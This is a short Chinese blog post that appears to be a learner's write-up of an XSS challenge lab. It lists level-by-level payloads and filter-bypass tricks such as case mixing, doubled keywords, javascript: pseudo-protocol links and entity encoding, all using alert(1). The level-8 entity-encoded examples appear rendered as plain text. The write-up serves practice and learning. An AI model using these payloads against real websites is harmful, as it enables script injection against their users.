原创web渗透

xss通关挑战

发表于2023-02-08更新于2023-10-24

字数总计:204阅读时长:1分钟阅读量: 北京

xss通关挑战

xiu2023-02-082023-10-24

绕过规则

关键字被过滤的情况

1 2	<svg> <svg onload="alert(1)">

大小写绕过

1 2	<ImG sRc=1 onerRor=alert(1);> <SvG OnlOad="alert(1)">

双写关键字（有限制）

1	<imimgg srsrcc=x onerror=alert("xss");>

Javascript伪协议的使用

1	<table background="javascript:alert(1)"></table>

level1

level2

1	"><script>alert(/xss/)</script>

level3

1	' onclick='alert(1)

level5

javascript伪协议绕过

1	"><a href='javascript:alert(1)'>

level6

事件或javascript伪协议大小写绕过

1
2
3

"><a Href='javascript:alert(1)'>

" Onclick="alert(1)

level7

javascript伪协议双写绕过）

1	"><a hhrefref='javasscriptcript:alert(1)'>

level8

javascript伪协议实体编码绕过

1	十进制实体编码：javascript:alert(1)

1	十六进制实体编码：javascript:alert(1)

xiu

一个网安练习生的小笔记

原创 xss通关挑战

本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 xiu`s blog！

数据库加载中